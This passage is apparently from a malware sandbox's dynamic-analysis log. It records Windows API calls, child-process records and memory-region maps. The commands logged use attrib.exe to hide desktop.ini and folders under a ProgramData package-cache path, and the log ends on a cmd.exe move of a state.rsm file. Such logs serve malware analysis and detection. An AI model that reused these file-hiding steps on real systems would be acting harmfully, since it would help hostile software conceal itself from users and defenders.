returned 2 [0203.039] GetConsoleTitleW (in: lpConsoleTitle=0x12f3dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.039] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f264, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f32c | out: lpAttributeList=0x12f264, lpSize=0x12f32c) returned 1 [0203.039] UpdateProcThreadAttribute (in: lpAttributeList=0x12f264, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f324, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f264, lpPreviousValue=0x0) returned 1 [0203.039] GetStartupInfoW (in: lpStartupInfo=0x12f220 | out: lpStartupInfo=0x12f220*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, 
dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0203.040] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.040] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f2c0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f30c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" ", lpProcessInformation=0x12f30c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xedc, dwThreadId=0xef4)) returned 1 [0203.051] CloseHandle (hObject=0x50) returned 1 [0203.051] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.051] GetEnvironmentStringsW () returned 0x2b2d50* [0203.051] FreeEnvironmentStringsW (penv=0x2b2d50) returned 1 [0203.051] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0203.293] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12f200 | out: lpExitCode=0x12f200*=0x0) returned 1 [0203.293] CloseHandle (hObject=0x4c) returned 1 [0203.293] _vsnwprintf (in: _Buffer=0x12f348, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f20c | out: _Buffer="00000000") returned 8 [0203.293] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0203.293] GetEnvironmentStringsW () returned 0x2b2d50* [0203.293] 
FreeEnvironmentStringsW (penv=0x2b2d50) returned 1 [0203.293] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0203.293] GetEnvironmentStringsW () returned 0x2b2d50* [0203.293] FreeEnvironmentStringsW (penv=0x2b2d50) returned 1 [0203.293] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f264 | out: lpAttributeList=0x12f264) [0203.293] GetConsoleTitleW (in: lpConsoleTitle=0x12f648, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.294] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.294] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0203.294] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.294] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.294] FindClose (in: hFindFile=0x2b0830 | out: hFindFile=0x2b0830) returned 1 [0203.294] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0203.294] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0203.294] GetConsoleTitleW (in: lpConsoleTitle=0x12f3dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.294] InitializeProcThreadAttributeList (in: lpAttributeList=0x12f264, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f32c | out: lpAttributeList=0x12f264, lpSize=0x12f32c) returned 1 [0203.295] UpdateProcThreadAttribute (in: lpAttributeList=0x12f264, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f324, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12f264, lpPreviousValue=0x0) returned 1 [0203.295] GetStartupInfoW (in: lpStartupInfo=0x12f220 | out: lpStartupInfo=0x12f220*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", 
lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0203.295] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0203.295] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f2c0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f30c | out: lpCommandLine="attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"", lpProcessInformation=0x12f30c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x128, dwThreadId=0xe14)) returned 1 [0203.476] CloseHandle (hObject=0x4c) returned 1 [0203.476] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0203.476] GetEnvironmentStringsW () returned 0x2b3790* [0203.476] FreeEnvironmentStringsW (penv=0x2b3790) returned 1 [0203.476] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0204.446] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12f200 | out: lpExitCode=0x12f200*=0x0) returned 1 [0204.446] CloseHandle (hObject=0x50) returned 1 [0204.446] _vsnwprintf (in: _Buffer=0x12f348, _BufferCount=0x13, _Format="%08X", _ArgList=0x12f20c | out: _Buffer="00000000") returned 8 [0204.446] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0204.446] GetEnvironmentStringsW () 
returned 0x2b3790* [0204.447] FreeEnvironmentStringsW (penv=0x2b3790) returned 1 [0204.447] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0204.447] GetEnvironmentStringsW () returned 0x2b3790* [0204.447] FreeEnvironmentStringsW (penv=0x2b3790) returned 1 [0204.447] DeleteProcThreadAttributeList (in: lpAttributeList=0x12f264 | out: lpAttributeList=0x12f264) [0204.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.447] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.448] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.448] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.448] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.448] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.448] SetConsoleInputExeNameW () returned 0x1 [0204.448] GetConsoleOutputCP () returned 0x1b5 [0204.448] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.448] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.449] exit (_Code=0) Process: id = "490" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e60" os_pid = "0xe74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "489" os_parent_pid = "0x8a4" cmd_line = "attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29984 start_va = 0x10000 end_va = 0x2ffff entry_point 
= 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29985 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29986 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29987 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 29988 start_va = 0xbb0000 end_va = 0xbb6fff entry_point = 0xbb0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 29989 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29990 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29991 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29992 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 29993 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29994 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29995 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: 
id = 29996 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29997 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 29998 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 29999 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30000 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30001 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30002 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30003 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30004 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30005 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = 
"msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30006 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30007 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30008 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30009 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30010 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30011 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 30012 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30013 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 687 os_tid = 0xeb8 Process: id = "491" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e60" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = 
"0x60800000" monitor_reason = "child_process" parent_id = "489" os_parent_pid = "0x8a4" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30063 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30064 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30065 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30066 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 30067 start_va = 0xf30000 end_va = 0xf36fff entry_point = 0xf30000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30068 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30069 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30070 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30071 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30072 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30073 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30074 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30075 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30076 start_va = 0x1d0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 30077 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 30078 start_va = 0x6dc20000 end_va = 0x6dc3cfff entry_point = 0x6dc20000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30079 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30080 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30081 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = 
mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30082 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30083 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30084 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30085 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30086 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30087 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30088 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30089 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30090 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000000c0000" filename = "" Region: id = 30091 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30092 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 688 os_tid = 0xef4 Process: id = "492" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16e60" os_pid = "0x128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "489" os_parent_pid = "0x8a4" cmd_line = "attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30119 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30120 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30121 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30122 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 30123 start_va = 0x930000 end_va = 0x936fff entry_point = 0x930000 
region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 30124 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30125 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30126 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30127 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 30128 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30129 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30130 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30131 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30132 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 30133 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 30134 start_va = 0x6dc00000 end_va = 0x6dc1cfff entry_point = 0x6dc00000 region_type = 
mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 30135 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30136 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 30137 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30138 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30139 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 30140 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30141 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30142 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30143 start_va = 0x773c0000 end_va = 
0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 30144 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30145 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30146 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 30147 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30148 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 689 os_tid = 0xe14 Process: id = "493" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0x928" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{E6E75~1\\state.rsm\" 